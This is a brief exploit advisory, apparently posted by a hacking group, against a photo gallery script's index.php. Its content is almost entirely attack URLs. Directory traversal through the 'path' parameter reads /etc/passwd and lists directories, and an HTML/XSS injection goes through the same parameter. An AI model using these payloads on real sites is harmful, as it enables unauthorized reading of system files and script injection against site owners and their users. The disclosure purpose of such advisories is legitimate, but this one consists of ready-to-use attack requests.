vendor:
http://www.jakeo.com

vuln :
http://[host]/foto/index.php?path=../../etc/passwd

http://[host]/foto/index.php?path=<b>xss</b>

http://[host]/foto/index.php?path=../../[directory listing]


Author : Vampire 

Vampire_chiristof@yahoo.com

Homepage : Www.HackerZ.iR

Www.H4ckerZ.Com

Iran HackerZ Security Team